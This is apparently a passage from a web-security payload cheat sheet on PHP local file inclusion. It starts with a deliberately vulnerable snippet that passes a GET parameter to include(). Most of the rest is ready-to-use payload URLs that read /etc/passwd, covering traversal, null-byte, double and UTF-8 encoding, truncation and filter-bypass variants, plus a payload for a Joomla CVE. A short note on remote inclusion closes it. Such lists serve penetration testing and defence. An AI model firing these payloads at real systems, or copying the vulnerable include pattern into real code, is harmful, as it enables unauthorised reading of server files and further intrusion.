<?php
$file = $_GET['page'];
include($file);
?>

In the following examples we include the /etc/passwd file, check the Directory & Path Traversal chapter for more interesting files.

<http://example.com/index.php?page=../../../etc/passwd>

Null Byte

⚠️ In versions of PHP below 5.3.4 we can terminate with null byte (%00).

<http://example.com/index.php?page=../../../etc/passwd%00>

Example: Joomla! Component Web TV 1.0 - CVE-2010-1470

{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00

Double Encoding

<http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd>
<http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00>

UTF-8 Encoding

<http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd>
<http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00>

Path Truncation

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

<http://example.com/index.php?page=../../../etc/passwd>............[ADD MORE]
<http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD> MORE]
<http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD> MORE]
<http://example.com/index.php?page=../../../>[ADD MORE]../../../../etc/passwd

Filter Bypass

<http://example.com/index.php?page=....//....//etc/passwd>
<http://example.com/index.php?page=..///////..////..//////etc/passwd>
<http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd>

Remote File Inclusion

Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion doesn't work anymore on a default configuration since allow_url_include is now disabled since PHP 5.